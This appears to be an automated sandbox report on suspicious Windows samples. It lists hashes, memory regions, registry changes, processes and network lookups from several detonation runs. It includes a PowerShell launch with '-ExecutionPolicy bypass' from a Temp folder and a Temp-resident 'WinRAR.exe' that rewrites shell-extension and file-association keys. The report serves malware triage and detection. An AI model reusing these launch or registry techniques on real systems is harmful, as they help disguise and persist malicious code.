| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/3088-69-0x00000000739A0000-0x0000000074150000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
121s
Max time network
140s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1
Network
Files
memory/2976-4-0x000000001B390000-0x000000001B672000-memory.dmp
memory/2976-5-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
memory/2976-7-0x0000000002620000-0x00000000026A0000-memory.dmp
memory/2976-6-0x00000000020D0000-0x00000000020D8000-memory.dmp
memory/2976-8-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
memory/2976-9-0x0000000002620000-0x00000000026A0000-memory.dmp
memory/2976-10-0x0000000002620000-0x00000000026A0000-memory.dmp
memory/2976-11-0x0000000002620000-0x00000000026A0000-memory.dmp
memory/2976-12-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
145s
Max time network
156s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x394
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
Files
memory/3636-0-0x000001DB64980000-0x000001DB649A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5oqynet5.bwo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3636-10-0x00007FFA254B0000-0x00007FFA25F71000-memory.dmp
memory/3636-11-0x000001DB62890000-0x000001DB628A0000-memory.dmp
memory/3636-12-0x000001DB62890000-0x000001DB628A0000-memory.dmp
memory/3636-15-0x00007FFA254B0000-0x00007FFA25F71000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
145s
Max time network
156s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4916 -ip 4916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 3140
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 172.68.195.51.in-addr.arpa | udp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
109s
Max time network
165s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5060 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
Files
memory/2408-0-0x0000000000400000-0x00000000008F2000-memory.dmp